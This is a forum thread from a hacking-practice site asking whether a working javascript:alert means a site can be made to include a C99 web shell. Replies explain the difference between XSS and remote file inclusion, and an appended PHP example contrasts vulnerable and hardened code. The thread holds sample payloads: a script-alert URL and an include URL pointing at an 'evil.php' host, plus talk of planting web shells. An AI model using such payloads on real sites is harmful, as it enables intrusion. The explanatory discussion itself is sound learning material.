| Author |
Does javascript alert always mean |
chronicburst
Member
Posts: 466
Location: /root/
Joined: 03.01.08 Rank: Elite |
|
Hey, I was just curious to know if when javascript:alert is used and works on a site. Does this always mean that you can run a shell through the site or not all the time?
|
|
| Author |
RE: Does javascript alert always mean |
spyware
Member

Posts: 4190
Location: The Netherlands
Joined: 14.04.07 Rank: God Warn Level: 90
|
|
It means you don't understand a thing about the subject you are studying.

"The chowner of property." - Zeph
Widespread intellectual and moral docility may be convenient for leaders in the short term, but it is suicidal for nations in the long term. - Carl Sagan
Since the grid is inescapable, what were the earlier lasers about? Does the corridor have a sense of humor? - Ebert |
|
| Author |
RE: Does javascript alert always mean |
chronicburst
Member
Posts: 466
Location: /root/
Joined: 03.01.08 Rank: Elite |
|
That's what I figured.
|
|
| Author |
RE: Does javascript alert always mean |
ShapeShifters
Member
Posts: 393
Location: I'm lost...
Joined: 21.12.07 Rank: God |
|
yeah man learn a bit about javascript injections. things will make more sense then.
to answer your question directly, no.
javascript injections have nothing to do with running a shell on a site.
 |
|
| Author |
RE: Does javascript alert always mean |
chronicburst
Member
Posts: 466
Location: /root/
Joined: 03.01.08 Rank: Elite |
|
No man, sorry. That's not what I mean. I was saying would the fact that javascript:alert works. Does this mean I could inject a shell such as C99 through a javascript snippet which runs the remote page locally.
Like ?page=www.site.com/shell
|
|
| Author |
RE: Does javascript alert always mean |
ShapeShifters
Member
Posts: 393
Location: I'm lost...
Joined: 21.12.07 Rank: God |
|
Nope. Think about it logically. You can javascript:alert any page (like for example this hbh page) so it wouldn't make much sense if you could then open up a shell on hbh because it is obviously a pretty secure website. If it was that easy there'd be nothing to taking over any site.
 |
|
| Author |
RE: Does javascript alert always mean |
yours31f
Second to one

Posts: 1678
Location: Dallas Texas
Joined: 27.04.07 Rank: Satan |
|
right all you're doing is saying "make a popup"
Debugging is what programmers do to beta software to make it take up more room on your hard drive if it is running too efficiently.

|
|
| Author |
RE: Does javascript alert always mean |
GTADarkDude
Member

Posts: 142
Location: The Netherlands
Joined: 23.02.08 Rank: God |
|
I think that's not what he means either. I think that what he asks is when a page is vulnerable to XSS, which you can test with a Javascript alert, whether you can also include a C99 shell. Am I right?
... |
|
| Author |
RE: Does javascript alert always mean |
Feralas
Member

Posts: 301
Location: 127.0.0.1
Joined: 25.02.08 Rank: HBH Guru |
|
index.php?id=<script>alert("abc");</script>
While the above may work, the below may not, and vice versa.
index.php?id=http://www.mysite.com/evil.php
/-- Ipsa Scientia Potestas Est --\

\-- Knowledge itself is power. --/

To fear death is to limit life.
|
|
| Author |
RE: Does javascript alert always mean |
Uber0n
Member

Posts: 1963
Location: Sweden
Joined: 13.06.06 Rank: God |
|
This thread made me confused, but I suppose the answer you're looking for is something like this:
"Just because you can put javascript injections in the URL bar no matter what site you're visiting, it doesn't mean the site is vulnerable to RFI. Javascript is client-side scripts and PHP is server-side."

http://uber0n.webs.com/ |
|
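The distinction the thread arrives at (a reflected script alert and a remote file inclusion are separate server-side code paths), shown as an added PHP example that is not part of any post above. The function names, the `pages/` paths and the allowlist are hypothetical; each sink appears in its vulnerable form beside a hardened one.

```php
<?php
// Added example with hypothetical handlers for an index.php-style page.
// Sink 1 writes a parameter into the HTML response (runs in the visitor's browser).
// Sink 2 passes a parameter to include() (runs on the server).
// A flaw in one says nothing about the other.

function render_vulnerable(string $id): string {
    // Parameter copied into HTML unescaped: the browser parses any markup in it.
    return "<p>Item: " . $id . "</p>";
}

function render_hardened(string $id): string {
    // Encode for the HTML context so the value is displayed as text.
    return "<p>Item: " . htmlspecialchars($id, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . "</p>";
}

function resolve_page_vulnerable(string $page): string {
    // The caller would hand this straight to include(). With the PHP setting
    // allow_url_include enabled, a URL here is fetched and executed server-side.
    return $page;
}

function resolve_page_hardened(string $page): ?string {
    // Map request values to fixed local files; anything else is rejected.
    $allowed = ['home' => 'pages/home.php', 'news' => 'pages/news.php'];
    return $allowed[$page] ?? null;
}

// Constructed inputs with the same shape as the two URLs quoted in the thread.
$markup = '<script>alert("abc");</script>';
$remote = 'http://www.mysite.com/evil.php';

// Sink 1: the same input, unescaped and escaped.
echo render_vulnerable($markup), "\n";
echo render_hardened($markup), "\n";

// Sink 2: the hardened resolver never returns caller-supplied paths or URLs.
var_dump(resolve_page_vulnerable($remote));
var_dump(resolve_page_hardened($remote));
var_dump(resolve_page_hardened('home'));

// A page can pair render_vulnerable() with resolve_page_hardened(): the alert
// test then succeeds while the include path accepts nothing but allowlisted keys.
```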